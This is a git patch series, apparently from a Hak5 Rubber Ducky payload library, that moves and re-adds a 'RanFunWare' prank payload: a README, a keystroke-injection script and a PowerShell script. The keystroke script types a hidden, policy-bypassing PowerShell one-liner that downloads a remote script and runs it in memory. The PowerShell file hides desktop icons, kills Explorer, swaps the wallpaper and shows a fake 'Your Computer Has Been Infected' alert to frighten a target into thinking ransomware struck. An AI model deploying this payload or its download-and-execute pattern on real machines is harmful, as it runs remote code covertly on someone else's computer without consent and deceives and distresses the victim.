From e3b3bf21210e3223a7b147282c1d062e8e8e23d5 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 23:05:29 -0400 Subject: [PATCH 1/2] Delete RanFunWare directory --- RanFunWare/README.md | 108 ----------------------------------------- RanFunWare/payload.txt | 16 ------ RanFunWare/r.ps1 | 70 -------------------------- 3 files changed, 194 deletions(-) delete mode 100644 RanFunWare/README.md delete mode 100644 RanFunWare/payload.txt delete mode 100644 RanFunWare/r.ps1 diff --git a/RanFunWare/README.md b/RanFunWare/README.md deleted file mode 100644 index 32c53525a..000000000 --- a/RanFunWare/README.md +++ /dev/null @@ -1,108 +0,0 @@ - - -

- - - -

- - -
- Table of Contents -
    -
  1. Description
    2. -
  2. Getting Started
    3. -
  3. Contributing
    4. -
  4. Version History
    5. -
  5. Contact
    6. -
  6. Acknowledgments
    7. -
-
- -# RanFunWare - -A payload to prank your friends into thinking their computer got hit with ransomware. - -## Description - -This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) - -## Getting Started - -### Dependencies - -* DropBox or other file sharing service - Your Shared link for the intended file -* Windows 10 - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory -``` -powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -atomiczsec - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

📱 My Socials 📱

-
- - - - - - -
- - C# - -
YouTube - 		- - Python - -
Twitter - 		- - Jsonnet - -
I-Am-Jakoby's Discord -
-
- -

(back to top)

- - - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) - -

(back to top)

diff --git a/RanFunWare/payload.txt b/RanFunWare/payload.txt deleted file mode 100644 index 87490168e..000000000 --- a/RanFunWare/payload.txt +++ /dev/null @@ -1,16 +0,0 @@ -REM Title: RanFunWare - -REM Author: atomiczsec - -REM Description: This payload will prank your target into thinking their machine got hit with ransomware. - -REM Target: Windows 10 - -DELAY 2000 -GUI r -DELAY 500 -STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl -ENTER - -REM Remember to replace the link with your DropBox shared link for the intended file to download -REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 \ No newline at end of file diff --git a/RanFunWare/r.ps1 b/RanFunWare/r.ps1 deleted file mode 100644 index b55733888..000000000 --- a/RanFunWare/r.ps1 +++ /dev/null @@ -1,70 +0,0 @@ -#Hides Desktop Icons -$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 -Get-Process "explorer"| Stop-Process - -#Changes Background -#URL For the Image of your choice (Wanna Cry Ransomware Background) -$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" - - -Invoke-WebRequest $url -OutFile C:\temp\test.jpg - - -$setwallpapersrc = @" -using System.Runtime.InteropServices; - -public class Wallpaper -{ - public const int SetDesktopWallpaper = 20; - public const int UpdateIniFile = 0x01; - public const int SendWinIniChange = 0x02; - [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] - private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); - public static void SetWallpaper(string path) - { - SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); - } -} -"@ -Add-Type -TypeDefinition $setwallpapersrc - -[Wallpaper]::SetWallpaper("C:\temp\test.jpg") - - -#Pop Up Message - -function MsgBox { - -[CmdletBinding()] -param ( -[Parameter (Mandatory = $True)] -[Alias("m")] -[string]$message, - -[Parameter (Mandatory = $False)] -[Alias("t")] -[string]$title, - -[Parameter (Mandatory = $False)] -[Alias("b")] -[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] -[string]$button, - -[Parameter (Mandatory = $False)] -[Alias("i")] -[ValidateSet('None','Hand','Question','Warning','Asterisk')] -[string]$image -) - -Add-Type -AssemblyName PresentationCore,PresentationFramework - -if (!$title) {$title = " "} -if (!$button) {$button = "OK"} -if (!$image) {$image = "None"} - -[System.Windows.MessageBox]::Show($message,$title,$button,$image) - -} - -MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning From 1977d49f8ea838a3448c9a0976145f3f32fae0d9 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 23:05:56 -0400 Subject: [PATCH 2/2] Add files via upload --- payloads/library/prank/RanFunWare/README.md | 108 ++++++++++++++++++ payloads/library/prank/RanFunWare/payload.txt | 16 +++ payloads/library/prank/RanFunWare/r.ps1 | 70 ++++++++++++ 3 files changed, 194 insertions(+) create mode 100644 payloads/library/prank/RanFunWare/README.md create mode 100644 payloads/library/prank/RanFunWare/payload.txt create mode 100644 payloads/library/prank/RanFunWare/r.ps1 diff --git a/payloads/library/prank/RanFunWare/README.md b/payloads/library/prank/RanFunWare/README.md new file mode 100644 index 000000000..32c53525a --- /dev/null +++ b/payloads/library/prank/RanFunWare/README.md @@ -0,0 +1,108 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# RanFunWare + +A payload to prank your friends into thinking their computer got hit with ransomware. + +## Description + +This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/prank/RanFunWare/payload.txt b/payloads/library/prank/RanFunWare/payload.txt new file mode 100644 index 000000000..87490168e --- /dev/null +++ b/payloads/library/prank/RanFunWare/payload.txt @@ -0,0 +1,16 @@ +REM Title: RanFunWare + +REM Author: atomiczsec + +REM Description: This payload will prank your target into thinking their machine got hit with ransomware. + +REM Target: Windows 10 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 \ No newline at end of file diff --git a/payloads/library/prank/RanFunWare/r.ps1 b/payloads/library/prank/RanFunWare/r.ps1 new file mode 100644 index 000000000..b55733888 --- /dev/null +++ b/payloads/library/prank/RanFunWare/r.ps1 @@ -0,0 +1,70 @@ +#Hides Desktop Icons +$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" +Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 +Get-Process "explorer"| Stop-Process + +#Changes Background +#URL For the Image of your choice (Wanna Cry Ransomware Background) +$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" + + +Invoke-WebRequest $url -OutFile C:\temp\test.jpg + + +$setwallpapersrc = @" +using System.Runtime.InteropServices; + +public class Wallpaper +{ + public const int SetDesktopWallpaper = 20; + public const int UpdateIniFile = 0x01; + public const int SendWinIniChange = 0x02; + [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] + private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); + public static void SetWallpaper(string path) + { + SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); + } +} +"@ +Add-Type -TypeDefinition $setwallpapersrc + +[Wallpaper]::SetWallpaper("C:\temp\test.jpg") + + +#Pop Up Message + +function MsgBox { + +[CmdletBinding()] +param ( +[Parameter (Mandatory = $True)] +[Alias("m")] +[string]$message, + +[Parameter (Mandatory = $False)] +[Alias("t")] +[string]$title, + +[Parameter (Mandatory = $False)] +[Alias("b")] +[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] +[string]$button, + +[Parameter (Mandatory = $False)] +[Alias("i")] +[ValidateSet('None','Hand','Question','Warning','Asterisk')] +[string]$image +) + +Add-Type -AssemblyName PresentationCore,PresentationFramework + +if (!$title) {$title = " "} +if (!$button) {$button = "OK"} +if (!$image) {$image = "None"} + +[System.Windows.MessageBox]::Show($message,$title,$button,$image) + +} + +MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning